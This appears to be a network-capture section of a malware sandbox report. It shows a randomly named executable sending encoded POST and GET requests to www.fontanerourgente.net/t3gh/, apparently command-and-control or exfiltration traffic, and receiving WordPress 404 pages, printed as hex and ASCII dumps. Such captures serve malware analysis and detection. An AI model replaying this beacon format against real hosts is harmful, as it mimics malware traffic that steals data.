                  Sep 4, 2024 09:36:19.092150927 CEST1236INData Raw: 28 6e 2e 73 75 70 70 6f 72 74 73 2e 65 76 65 72 79 74 68 69 6e 67 45 78 63 65 70 74 46 6c 61 67 3d 6e 2e 73 75 70 70 6f 72 74 73 2e 65 76 65 72 79 74 68 69 6e 67 45 78 63 65 70 74 46 6c 61 67 26 26 6e 2e 73 75 70 70 6f 72 74 73 5b 74 5d 29 3b 6e
                  Data Ascii: (n.supports.everythingExceptFlag=n.supports.everythingExceptFlag&&n.supports[t]);n.supports.everythingExceptFlag=n.supports.everythingExceptFlag&&!n.supports.flag,n.DOMReady=!1,n.readyCallback=function(){n.DOMReady=!0}}).then(function(){return
                  Sep 4, 2024 09:36:19.092161894 CEST896INData Raw: 69 75 73 3a 34 70 78 3b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 4d 65 6e 6c 6f 2c 43 6f 6e 73 6f 6c 61 73 2c 6d 6f 6e 61 63 6f 2c 6d 6f 6e 6f 73 70 61 63 65 3b 70 61 64 64 69 6e 67 3a 2e 38 65 6d 20 31 65 6d 7d 2e 77 70 2d 62 6c 6f 63 6b 2d 65 6d 62
                  Data Ascii: ius:4px;font-family:Menlo,Consolas,monaco,monospace;padding:.8em 1em}.wp-block-embed :where(figcaption){color:#555;font-size:13px;text-align:center}.is-dark-theme .wp-block-embed :where(figcaption){color:#ffffffa6}.wp-block-embed{margin:0 0 1e
                  Sep 4, 2024 09:36:19.092171907 CEST1236INData Raw: 6d 7d 2e 77 70 2d 62 6c 6f 63 6b 2d 71 75 6f 74 65 20 63 69 74 65 2c 2e 77 70 2d 62 6c 6f 63 6b 2d 71 75 6f 74 65 20 66 6f 6f 74 65 72 7b 63 6f 6c 6f 72 3a 63 75 72 72 65 6e 74 43 6f 6c 6f 72 3b 66 6f 6e 74 2d 73 69 7a 65 3a 2e 38 31 32 35 65 6d
                  Data Ascii: m}.wp-block-quote cite,.wp-block-quote footer{color:currentColor;font-size:.8125em;font-style:normal;position:relative}.wp-block-quote.has-text-align-right{border-left:none;border-right:.25em solid;padding-left:0;padding-right:1em}.wp-block-qu
                  Sep 4, 2024 09:36:19.092184067 CEST1236INData Raw: 63 6f 6c 6f 72 3a 23 66 66 66 66 66 66 61 36 7d 2e 77 70 2d 62 6c 6f 63 6b 2d 76 69 64 65 6f 20 3a 77 68 65 72 65 28 66 69 67 63 61 70 74 69 6f 6e 29 7b 63 6f 6c 6f 72 3a 23 35 35 35 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 33 70 78 3b 74 65 78 74 2d
                  Data Ascii: color:#ffffffa6}.wp-block-video :where(figcaption){color:#555;font-size:13px;text-align:center}.is-dark-theme .wp-block-video :where(figcaption){color:#ffffffa6}.wp-block-video{margin:0 0 1em}:root :where(.wp-block-template-part.has-background
                  Sep 4, 2024 09:36:19.092196941 CEST1236INData Raw: 6c 6f 72 2d 2d 6c 75 6d 69 6e 6f 75 73 2d 76 69 76 69 64 2d 61 6d 62 65 72 3a 20 23 66 63 62 39 30 30 3b 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 63 6f 6c 6f 72 2d 2d 6c 69 67 68 74 2d 67 72 65 65 6e 2d 63 79 61 6e 3a 20 23 37 62 64 63 62 35 3b
                  Data Ascii: lor--luminous-vivid-amber: #fcb900;--wp--preset--color--light-green-cyan: #7bdcb5;--wp--preset--color--vivid-green-cyan: #00d084;--wp--preset--color--pale-cyan-blue: #8ed1fc;--wp--preset--color--vivid-cyan-blue: #0693e3;--wp--preset--color--vi
                  Sep 4, 2024 09:36:19.092209101 CEST1236INData Raw: 72 75 6d 3a 20 6c 69 6e 65 61 72 2d 67 72 61 64 69 65 6e 74 28 31 33 35 64 65 67 2c 72 67 62 28 37 34 2c 32 33 34 2c 32 32 30 29 20 30 25 2c 72 67 62 28 31 35 31 2c 31 32 30 2c 32 30 39 29 20 32 30 25 2c 72 67 62 28 32 30 37 2c 34 32 2c 31 38 36
                  Data Ascii: rum: linear-gradient(135deg,rgb(74,234,220) 0%,rgb(151,120,209) 20%,rgb(207,42,186) 40%,rgb(238,44,130) 60%,rgb(251,105,98) 80%,rgb(254,248,76) 100%);--wp--preset--gradient--blush-light-purple: linear-gradient(135deg,rgb(255,206,236) 0%,rgb(15
                  Sep 4, 2024 09:36:19.092220068 CEST1236INData Raw: 65 61 72 2d 67 72 61 64 69 65 6e 74 28 31 36 30 64 65 67 2c 20 23 45 34 44 31 44 31 20 30 25 2c 20 23 45 45 45 41 44 44 20 31 30 30 25 29 3b 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 67 72 61 64 69 65 6e 74 2d 2d 79 65 6c 6c 6f 77 2d 74 6f 2d 72
                  Data Ascii: ear-gradient(160deg, #E4D1D1 0%, #EEEADD 100%);--wp--preset--gradient--yellow-to-red: linear-gradient(160deg, #EEEADD 0%, #E4D1D1 100%);--wp--preset--gradient--purple-to-red: linear-gradient(160deg, #D1D1E4 0%, #E4D1D1 100%);--wp--preset--grad
                  Sep 4, 2024 09:36:19.097244024 CEST1236INData Raw: 2c 20 30 2c 20 30 2c 20 31 29 3b 7d 3a 77 68 65 72 65 28 2e 69 73 2d 6c 61 79 6f 75 74 2d 66 6c 65 78 29 7b 67 61 70 3a 20 30 2e 35 65 6d 3b 7d 3a 77 68 65 72 65 28 2e 69 73 2d 6c 61 79 6f 75 74 2d 67 72 69 64 29 7b 67 61 70 3a 20 30 2e 35 65 6d
                  Data Ascii: , 0, 0, 1);}:where(.is-layout-flex){gap: 0.5em;}:where(.is-layout-grid){gap: 0.5em;}body .is-layout-flex{display: flex;}.is-layout-flex{flex-wrap: wrap;align-items: center;}.is-layout-flex > :is(*, div){margin: 0;}body .is-layout-grid{display:


                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                  7192.168.2.44974437.187.158.211805440C:\Program Files (x86)\PXpzocSFVzFONOXWptnFWTaDqfnIctMuzRnAPIqOuQavRxzHvBDDaiqcVJ\sXIYDUFnJY.exe
                  TimestampBytes transferredDirectionData
                  Sep 4, 2024 09:36:20.747164011 CEST10871OUTPOST /t3gh/ HTTP/1.1
                  Host: www.fontanerourgente.net
                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                  Accept-Language: en-US,en;q=0.5
                  Accept-Encoding: gzip, deflate
                  Origin: http://www.fontanerourgente.net
                  Referer: http://www.fontanerourgente.net/t3gh/
                  Cache-Control: max-age=0
                  Connection: close
                  Content-Length: 10301
                  Content-Type: application/x-www-form-urlencoded
                  User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; de-de; SAMSUNG SM-T520 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Version/1.5 Chrome/28.0.1500.94 Safari/537.36
                  Data Raw: 35 36 67 44 3d 51 39 77 6e 59 55 52 7a 78 77 6a 6e 6e 47 6a 6c 6b 67 38 77 30 2b 54 6f 4c 35 69 62 6f 51 63 54 61 38 6a 65 53 4a 39 67 6d 78 4a 54 50 6a 63 50 61 79 45 4a 59 37 72 69 2f 43 74 30 58 79 30 78 73 4b 58 71 6c 2f 36 41 43 57 57 32 61 6f 5a 4b 51 38 64 6f 78 53 56 31 36 79 44 6e 34 49 6e 77 74 6c 68 37 70 62 31 78 79 4a 6a 72 76 59 44 46 59 5a 65 63 55 61 34 4c 69 4b 71 53 44 54 50 70 4a 73 76 46 52 4a 54 50 42 70 46 79 69 59 2f 42 71 69 36 46 52 74 6b 67 38 64 70 45 6b 47 2f 43 72 31 7a 44 38 6c 58 53 76 2b 64 64 66 66 67 35 6e 53 30 6c 52 59 69 42 61 49 31 32 30 41 51 56 6b 4f 6c 43 65 42 45 33 6f 37 2f 61 70 39 48 6f 2f 35 65 54 58 70 70 39 41 4a 61 2b 64 44 56 75 41 53 64 48 38 30 70 75 36 47 7a 4f 38 4c 73 51 6a 4e 73 67 46 77 67 4a 45 43 6d 73 68 30 4b 68 66 67 42 61 65 73 69 52 59 69 37 44 62 76 4d 56 6b 53 49 66 68 61 48 50 58 4c 62 79 46 32 47 32 34 2f 5a 6b 57 41 44 7a 62 4b 31 6f 47 64 72 68 70 53 54 4e 38 4c 67 72 6d 51 74 65 5a 69 6d 50 74 4c 4f 31 62 70 58 4c 63 33 38 66 42 [TRUNCATED]
                  Data Ascii: 56gD=Q9wnYURzxwjnnGjlkg8w0+ToL5iboQcTa8jeSJ9gmxJTPjcPayEJY7ri/Ct0Xy0xsKXql/6ACWW2aoZKQ8doxSV16yDn4Inwtlh7pb1xyJjrvYDFYZecUa4LiKqSDTPpJsvFRJTPBpFyiY/Bqi6FRtkg8dpEkG/Cr1zD8lXSv+ddffg5nS0lRYiBaI120AQVkOlCeBE3o7/ap9Ho/5eTXpp9AJa+dDVuASdH80pu6GzO8LsQjNsgFwgJECmsh0KhfgBaesiRYi7DbvMVkSIfhaHPXLbyF2G24/ZkWADzbK1oGdrhpSTN8LgrmQteZimPtLO1bpXLc38fBn7s/VzAxFFw0gtjDSn1fLwSrQ1DPX1HmsCGL0U0VM1NaymNIMkyynYTMBf1tkjAxXpN83/BWwC92SUao/Y/ODSX7O/7Wqh63RtC6bkZ0gYRPy0/ZVo7s4OujFEdFm1UdJxXsYpafdamNlV+PxqKRTTs1+y8KtCaSM8FKNR7mSDEywyspHocJHH2F2ag3y59AGjdypbKoXDArESOv7FMGuyCfbCrR8LYQlC+90G1hU83sIMIQfJm6y8lH9YcbgSMMXmACPZB/1FiqUomAB1JuzXij7bwH+zCMdNgbLy2Br/WntWtO0q16ygDc7DAxtkI0z2AiWY0sCFrp60ENfQKyXJ04uSDSO4zQ6g8JfL9X8EwXD2rALid6rr9XmHoD/WX5Jt0rkEtsLO4A7RuPMBJhVjd3V4U7mDoSmJvtr07Yc00vJ+Wbh0VvWXn/jvzR/FeetMAW+I4zhWt0LGFqba1PKjPB3TCabXcMzr+U9pE4egB1fr7Gt5F+YfkEwCy+p+20kBsz8RnQNmAJuwvmpnb+iPxJHDcC39XwrVFyrIsRwNr//t5Rs5cNShgiMCUdwDNjmiXkO+qCJU1z6mHrvTfrOO8U9Y5ZufUxuuZznW+8/YT8BFb9zr168cM3n/XwglB0Q4nxty5D74nuSegnjgozttSiSOiHksK2Ur [TRUNCATED]
                  Sep 4, 2024 09:36:21.662584066 CEST1236INHTTP/1.1 404 Not Found
                  Date: Wed, 04 Sep 2024 07:36:21 GMT
                  Server: Apache
                  Expires: Wed, 11 Jan 1984 05:00:00 GMT
                  Cache-Control: no-cache, must-revalidate, max-age=0
                  Link: <https://mgmasistencia.com/wp-json/>; rel="https://api.w.org/"
                  Connection: close
                  Transfer-Encoding: chunked
                  Content-Type: text/html; charset=UTF-8
                  Data Raw: 31 63 65 32 0d 0a 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 73 22 20 3e 0a 3c 68 65 61 64 3e 0a 09 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 20 2f 3e 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 20 2f 3e 0a 09 3c 74 69 74 6c 65 3e 50 c3 a1 67 69 6e 61 20 6e 6f 20 65 6e 63 6f 6e 74 72 61 64 61 20 26 23 38 32 31 31 3b 20 4d 47 4d 20 41 73 69 73 74 65 6e 63 69 61 3c 2f 74 69 74 6c 65 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 27 72 6f 62 6f 74 73 27 20 63 6f 6e 74 65 6e 74 3d 27 6d 61 78 2d 69 6d 61 67 65 2d 70 72 65 76 69 65 77 3a 6c 61 72 67 65 27 20 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 27 64 6e 73 2d 70 72 65 66 65 74 63 68 27 20 68 72 65 66 3d 27 2f 2f 6d 67 6d 61 73 69 73 74 65 6e 63 69 61 2e 63 6f 6d 27 20 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 61 6c 74 65 72 6e 61 74 65 [TRUNCATED]
                  Data Ascii: 1ce2<!doctype html><html lang="es" ><head><meta charset="UTF-8" /><meta name="viewport" content="width=device-width, initial-scale=1" /><title>Pgina no encontrada &#8211; MGM Asistencia</title><meta name='robots' content='max-image-preview:large' /><link rel='dns-prefetch' href='//mgmasistencia.com' /><link rel="alternate" type="application/rss+xml" title="MGM Asistencia &raquo; Feed" href="https://mgmasistencia.com/feed/" /><link rel="alternate" type="application/rss+xml" title="MGM Asistencia &raquo; Feed de los comentarios" href="https://mgmasistencia.com/comments/feed/" /><script>window._wpemojiSettings = {"baseUrl":"https:\/\/s.w.org\/images\/core\/emoji\/15.0.3\/72x72\/","ext":".png","svgUrl":"https:\/\/s.w.org\/images\/core\/emoji\/15.0.3\/svg\/","svgExt":".svg","source":{"concatemoji":"http:\/\/mgmasistencia.com\/wp-includes\/js\/wp-emoji-release.min.js?ver=6.6.1"}};/
                  Sep 4, 2024 09:36:21.662600040 CEST1236INData Raw: 2a 21 20 54 68 69 73 20 66 69 6c 65 20 69 73 20 61 75 74 6f 2d 67 65 6e 65 72 61 74 65 64 20 2a 2f 0a 21 66 75 6e 63 74 69 6f 6e 28 69 2c 6e 29 7b 76 61 72 20 6f 2c 73 2c 65 3b 66 75 6e 63 74 69 6f 6e 20 63 28 65 29 7b 74 72 79 7b 76 61 72 20 74
                  Data Ascii: *! This file is auto-generated */!function(i,n){var o,s,e;function c(e){try{var t={supportTests:e,timestamp:(new Date).valueOf()};sessionStorage.setItem(o,JSON.stringify(t))}catch(e){}}function p(e,t,n){e.clearRect(0,0,e.canvas.width,e.canvas
                  Sep 4, 2024 09:36:21.662610054 CEST1236INData Raw: 29 2c 6f 3d 28 61 2e 74 65 78 74 42 61 73 65 6c 69 6e 65 3d 22 74 6f 70 22 2c 61 2e 66 6f 6e 74 3d 22 36 30 30 20 33 32 70 78 20 41 72 69 61 6c 22 2c 7b 7d 29 3b 72 65 74 75 72 6e 20 65 2e 66 6f 72 45 61 63 68 28 66 75 6e 63 74 69 6f 6e 28 65 29
                  Data Ascii: ),o=(a.textBaseline="top",a.font="600 32px Arial",{});return e.forEach(function(e){o[e]=t(a,e,n)}),o}function t(e){var t=i.createElement("script");t.src=e,t.defer=!0,i.head.appendChild(t)}"undefined"!=typeof Promise&&(o="wpEmojiSettingsSupport
                  Sep 4, 2024 09:36:21.662621021 CEST672INData Raw: 28 6e 2e 73 75 70 70 6f 72 74 73 2e 65 76 65 72 79 74 68 69 6e 67 45 78 63 65 70 74 46 6c 61 67 3d 6e 2e 73 75 70 70 6f 72 74 73 2e 65 76 65 72 79 74 68 69 6e 67 45 78 63 65 70 74 46 6c 61 67 26 26 6e 2e 73 75 70 70 6f 72 74 73 5b 74 5d 29 3b 6e
                  Data Ascii: (n.supports.everythingExceptFlag=n.supports.everythingExceptFlag&&n.supports[t]);n.supports.everythingExceptFlag=n.supports.everythingExceptFlag&&!n.supports.flag,n.DOMReady=!1,n.readyCallback=function(){n.DOMReady=!0}}).then(function(){return
                  Sep 4, 2024 09:36:21.662780046 CEST1236INData Raw: 74 3b 0a 09 09 6d 61 72 67 69 6e 3a 20 30 20 30 2e 30 37 65 6d 20 21 69 6d 70 6f 72 74 61 6e 74 3b 0a 09 09 76 65 72 74 69 63 61 6c 2d 61 6c 69 67 6e 3a 20 2d 30 2e 31 65 6d 20 21 69 6d 70 6f 72 74 61 6e 74 3b 0a 09 09 62 61 63 6b 67 72 6f 75 6e
                  Data Ascii: t;margin: 0 0.07em !important;vertical-align: -0.1em !important;background: none !important;padding: 0 !important;}</style><link rel='stylesheet' id='wp-block-library-css' href='http://mgmasistencia.com/wp-includes/css/dist/blo
                  Sep 4, 2024 09:36:21.662796974 CEST1236INData Raw: 75 6c 6c 71 75 6f 74 65 20 63 69 74 65 2c 2e 77 70 2d 62 6c 6f 63 6b 2d 70 75 6c 6c 71 75 6f 74 65 20 66 6f 6f 74 65 72 2c 2e 77 70 2d 62 6c 6f 63 6b 2d 70 75 6c 6c 71 75 6f 74 65 5f 5f 63 69 74 61 74 69 6f 6e 7b 63 6f 6c 6f 72 3a 63 75 72 72 65
                  Data Ascii: ullquote cite,.wp-block-pullquote footer,.wp-block-pullquote__citation{color:currentColor;font-size:.8125em;font-style:normal;text-transform:uppercase}.wp-block-quote{border-left:.25em solid;margin:0 0 1.75em;padding-left:1em}.wp-block-quote c
                  Sep 4, 2024 09:36:21.662806988 CEST1236INData Raw: 67 68 74 3a 32 70 78 7d 2e 77 70 2d 62 6c 6f 63 6b 2d 74 61 62 6c 65 7b 6d 61 72 67 69 6e 3a 30 20 30 20 31 65 6d 7d 2e 77 70 2d 62 6c 6f 63 6b 2d 74 61 62 6c 65 20 74 64 2c 2e 77 70 2d 62 6c 6f 63 6b 2d 74 61 62 6c 65 20 74 68 7b 77 6f 72 64 2d
                  Data Ascii: ght:2px}.wp-block-table{margin:0 0 1em}.wp-block-table td,.wp-block-table th{word-break:normal}.wp-block-table :where(figcaption){color:#555;font-size:13px;text-align:center}.is-dark-theme .wp-block-table :where(figcaption){color:#ffffffa6}.wp
                  Sep 4, 2024 09:36:21.662893057 CEST1236INData Raw: 72 65 73 65 74 2d 2d 63 6f 6c 6f 72 2d 2d 63 79 61 6e 2d 62 6c 75 69 73 68 2d 67 72 61 79 3a 20 23 61 62 62 38 63 33 3b 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 63 6f 6c 6f 72 2d 2d 77 68 69 74 65 3a 20 23 46 46 46 46 46 46 3b 2d 2d 77 70 2d 2d
                  Data Ascii: reset--color--cyan-bluish-gray: #abb8c3;--wp--preset--color--white: #FFFFFF;--wp--preset--color--pale-pink: #f78da7;--wp--preset--color--vivid-red: #cf2e2e;--wp--preset--color--luminous-vivid-orange: #ff6900;--wp--preset--color--luminous-vivid
                  Sep 4, 2024 09:36:21.662904024 CEST1236INData Raw: 64 69 65 6e 74 28 31 33 35 64 65 67 2c 72 67 62 61 28 32 35 35 2c 31 30 35 2c 30 2c 31 29 20 30 25 2c 72 67 62 28 32 30 37 2c 34 36 2c 34 36 29 20 31 30 30 25 29 3b 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 67 72 61 64 69 65 6e 74 2d 2d 76 65 72
                  Data Ascii: dient(135deg,rgba(255,105,0,1) 0%,rgb(207,46,46) 100%);--wp--preset--gradient--very-light-gray-to-cyan-bluish-gray: linear-gradient(135deg,rgb(238,238,238) 0%,rgb(169,184,195) 100%);--wp--preset--gradient--cool-to-warm-spectrum: linear-gradien
                  Sep 4, 2024 09:36:21.662915945 CEST1236INData Raw: 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 67 72 61 64 69 65 6e 74 2d 2d 67 72 65 65 6e 2d 74 6f 2d 79 65 6c 6c 6f 77 3a 20 6c 69 6e 65 61 72 2d 67 72 61 64 69 65 6e 74 28 31 36 30 64 65 67 2c 20 23 44 31 45 34 44 44 20 30 25 2c 20 23 45 45 45 41
                  Data Ascii: --wp--preset--gradient--green-to-yellow: linear-gradient(160deg, #D1E4DD 0%, #EEEADD 100%);--wp--preset--gradient--yellow-to-green: linear-gradient(160deg, #EEEADD 0%, #D1E4DD 100%);--wp--preset--gradient--red-to-yellow: linear-gradient(160deg
                  Sep 4, 2024 09:36:21.667606115 CEST1236INData Raw: 72 67 62 61 28 30 2c 20 30 2c 20 30 2c 20 30 2e 34 29 3b 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 73 68 61 64 6f 77 2d 2d 73 68 61 72 70 3a 20 36 70 78 20 36 70 78 20 30 70 78 20 72 67 62 61 28 30 2c 20 30 2c 20 30 2c 20 30 2e 32 29 3b 2d 2d 77
                  Data Ascii: rgba(0, 0, 0, 0.4);--wp--preset--shadow--sharp: 6px 6px 0px rgba(0, 0, 0, 0.2);--wp--preset--shadow--outlined: 6px 6px 0px -3px rgba(255, 255, 255, 1), 6px 6px rgba(0, 0, 0, 1);--wp--preset--shadow--crisp: 6px 6px 0px rgba(0, 0, 0, 1);}:where(


                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                  8192.168.2.44974537.187.158.211805440C:\Program Files (x86)\PXpzocSFVzFONOXWptnFWTaDqfnIctMuzRnAPIqOuQavRxzHvBDDaiqcVJ\sXIYDUFnJY.exe
                  TimestampBytes transferredDirectionData
                  Sep 4, 2024 09:36:23.303534031 CEST489OUTGET /t3gh/?56gD=d/YHbjU0lRTRkwDxqDIxsrPGLZyEpz4ER5WtK+J3r0U/ADUIPiMSea/+ySZyWjMipb/6l9jjBkeXWJl7BthesnFC5CTi9Yzd9moJgM9Hp7ieo4nvRaLbJdA=&gTSpc=Khb8pT HTTP/1.1
                  Host: www.fontanerourgente.net
                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                  Accept-Language: en-US,en;q=0.5
                  Connection: close
                  User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; de-de; SAMSUNG SM-T520 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Version/1.5 Chrome/28.0.1500.94 Safari/537.36
                  Sep 4, 2024 09:36:24.163136005 CEST1236INHTTP/1.1 404 Not Found
                  Date: Wed, 04 Sep 2024 07:36:23 GMT
                  Server: Apache
                  Expires: Wed, 11 Jan 1984 05:00:00 GMT
                  Cache-Control: no-cache, must-revalidate, max-age=0
                  Link: <https://mgmasistencia.com/wp-json/>; rel="https://api.w.org/"
                  Connection: close
                  Transfer-Encoding: chunked
                  Content-Type: text/html; charset=UTF-8
                  Data Raw: 31 63 65 32 0d 0a 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 73 22 20 3e 0a 3c 68 65 61 64 3e 0a 09 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 20 2f 3e 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 20 2f 3e 0a 09 3c 74 69 74 6c 65 3e 50 c3 a1 67 69 6e 61 20 6e 6f 20 65 6e 63 6f 6e 74 72 61 64 61 20 26 23 38 32 31 31 3b 20 4d 47 4d 20 41 73 69 73 74 65 6e 63 69 61 3c 2f 74 69 74 6c 65 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 27 72 6f 62 6f 74 73 27 20 63 6f 6e 74 65 6e 74 3d 27 6d 61 78 2d 69 6d 61 67 65 2d 70 72 65 76 69 65 77 3a 6c 61 72 67 65 27 20 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 27 64 6e 73 2d 70 72 65 66 65 74 63 68 27 20 68 72 65 66 3d 27 2f 2f 6d 67 6d 61 73 69 73 74 65 6e 63 69 61 2e 63 6f 6d 27 20 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 61 6c 74 65 72 6e 61 74 65 [TRUNCATED]
                  Data Ascii: 1ce2<!doctype html><html lang="es" ><head><meta charset="UTF-8" /><meta name="viewport" content="width=device-width, initial-scale=1" /><title>Pgina no encontrada &#8211; MGM Asistencia</title><meta name='robots' content='max-image-preview:large' /><link rel='dns-prefetch' href='//mgmasistencia.com' /><link rel="alternate" type="application/rss+xml" title="MGM Asistencia &raquo; Feed" href="https://mgmasistencia.com/feed/" /><link rel="alternate" type="application/rss+xml" title="MGM Asistencia &raquo; Feed de los comentarios" href="https://mgmasistencia.com/comments/feed/" /><script>window._wpemojiSettings = {"baseUrl":"https:\/\/s.w.org\/images\/core\/emoji\/15.0.3\/72x72\/","ext":".png","svgUrl":"https:\/\/s.w.org\/images\/core\/emoji\/15.0.3\/svg\/","svgExt":".svg","source":{"concatemoji":"http:\/\/mgmasistencia.com\/wp-includes\/js\/wp-emoji-release.min.js?ver=6.6.1"}};/
                  Sep 4, 2024 09:36:24.163294077 CEST224INData Raw: 2a 21 20 54 68 69 73 20 66 69 6c 65 20 69 73 20 61 75 74 6f 2d 67 65 6e 65 72 61 74 65 64 20 2a 2f 0a 21 66 75 6e 63 74 69 6f 6e 28 69 2c 6e 29 7b 76 61 72 20 6f 2c 73 2c 65 3b 66 75 6e 63 74 69 6f 6e 20 63 28 65 29 7b 74 72 79 7b 76 61 72 20 74
                  Data Ascii: *! This file is auto-generated */!function(i,n){var o,s,e;function c(e){try{var t={supportTests:e,timestamp:(new Date).valueOf()};sessionStorage.setItem(o,JSON.stringify(t))}catch(e){}}function p(e,t,n){e.clearRect(0,0,e.ca
                  Sep 4, 2024 09:36:24.163304090 CEST1236INData Raw: 6e 76 61 73 2e 77 69 64 74 68 2c 65 2e 63 61 6e 76 61 73 2e 68 65 69 67 68 74 29 2c 65 2e 66 69 6c 6c 54 65 78 74 28 74 2c 30 2c 30 29 3b 76 61 72 20 74 3d 6e 65 77 20 55 69 6e 74 33 32 41 72 72 61 79 28 65 2e 67 65 74 49 6d 61 67 65 44 61 74 61
                  Data Ascii: nvas.width,e.canvas.height),e.fillText(t,0,0);var t=new Uint32Array(e.getImageData(0,0,e.canvas.width,e.canvas.height).data),r=(e.clearRect(0,0,e.canvas.width,e.canvas.height),e.fillText(n,0,0),new Uint32Array(e.getImageData(0,0,e.canvas.width
                  Sep 4, 2024 09:36:24.163316011 CEST1236INData Raw: 6d 6f 6a 69 53 65 74 74 69 6e 67 73 53 75 70 70 6f 72 74 73 22 2c 73 3d 5b 22 66 6c 61 67 22 2c 22 65 6d 6f 6a 69 22 5d 2c 6e 2e 73 75 70 70 6f 72 74 73 3d 7b 65 76 65 72 79 74 68 69 6e 67 3a 21 30 2c 65 76 65 72 79 74 68 69 6e 67 45 78 63 65 70
                  Data Ascii: mojiSettingsSupports",s=["flag","emoji"],n.supports={everything:!0,everythingExceptFlag:!0},e=new Promise(function(e){i.addEventListener("DOMContentLoaded",e,{once:!0})}),new Promise(function(t){var n=function(){try{var e=JSON.parse(sessionSto
                  Sep 4, 2024 09:36:24.163330078 CEST1236INData Raw: 6e 28 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 65 7d 29 2e 74 68 65 6e 28 66 75 6e 63 74 69 6f 6e 28 29 7b 76 61 72 20 65 3b 6e 2e 73 75 70 70 6f 72 74 73 2e 65 76 65 72 79 74 68 69 6e 67 7c 7c 28 6e 2e 72 65 61 64 79 43 61 6c 6c 62
                  Data Ascii: n(function(){return e}).then(function(){var e;n.supports.everything||(n.readyCallback(),(e=n.source||{}).concatemoji?t(e.concatemoji):e.wpemoji&&e.twemoji&&(t(e.twemoji),t(e.wpemoji)))}))}((window,document),window._wpemojiSettings);</script>
                  Sep 4, 2024 09:36:24.163383961 CEST1236INData Raw: 65 6d 62 65 64 7b 6d 61 72 67 69 6e 3a 30 20 30 20 31 65 6d 7d 2e 62 6c 6f 63 6b 73 2d 67 61 6c 6c 65 72 79 2d 63 61 70 74 69 6f 6e 7b 63 6f 6c 6f 72 3a 23 35 35 35 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 33 70 78 3b 74 65 78 74 2d 61 6c 69 67 6e 3a
                  Data Ascii: embed{margin:0 0 1em}.blocks-gallery-caption{color:#555;font-size:13px;text-align:center}.is-dark-theme .blocks-gallery-caption{color:#ffffffa6}:root :where(.wp-block-image figcaption){color:#555;font-size:13px;text-align:center}.is-dark-theme
                  Sep 4, 2024 09:36:24.163393974 CEST1236INData Raw: 69 6e 67 3a 31 2e 32 35 65 6d 20 32 2e 33 37 35 65 6d 7d 2e 77 70 2d 62 6c 6f 63 6b 2d 73 65 70 61 72 61 74 6f 72 2e 68 61 73 2d 63 73 73 2d 6f 70 61 63 69 74 79 7b 6f 70 61 63 69 74 79 3a 2e 34 7d 2e 77 70 2d 62 6c 6f 63 6b 2d 73 65 70 61 72 61
                  Data Ascii: ing:1.25em 2.375em}.wp-block-separator.has-css-opacity{opacity:.4}.wp-block-separator{border:none;border-bottom:2px solid;margin-left:auto;margin-right:auto}.wp-block-separator.has-alpha-channel-opacity{opacity:1}.wp-block-separator:not(.is-st
                  Sep 4, 2024 09:36:24.163405895 CEST1236INData Raw: 32 35 65 6d 7d 2e 77 70 2d 62 6c 6f 63 6b 2d 66 69 6c 65 5f 5f 62 75 74 74 6f 6e 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 33 32 33 37 33 63 3b 63 6f 6c 6f 72 3a 23 66 66 66 3b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 6e 6f 6e 65 7d 0a 3c 2f
                  Data Ascii: 25em}.wp-block-file__button{background:#32373c;color:#fff;text-decoration:none}</style>2000<style id='global-styles-inline-css'>:root{--wp--preset--aspect-ratio--square: 1;--wp--preset--aspect-ratio--4-3: 4/3;--wp--preset--aspect-ratio-
                  Sep 4, 2024 09:36:24.163419008 CEST1236INData Raw: 65 74 2d 2d 67 72 61 64 69 65 6e 74 2d 2d 76 69 76 69 64 2d 63 79 61 6e 2d 62 6c 75 65 2d 74 6f 2d 76 69 76 69 64 2d 70 75 72 70 6c 65 3a 20 6c 69 6e 65 61 72 2d 67 72 61 64 69 65 6e 74 28 31 33 35 64 65 67 2c 72 67 62 61 28 36 2c 31 34 37 2c 32
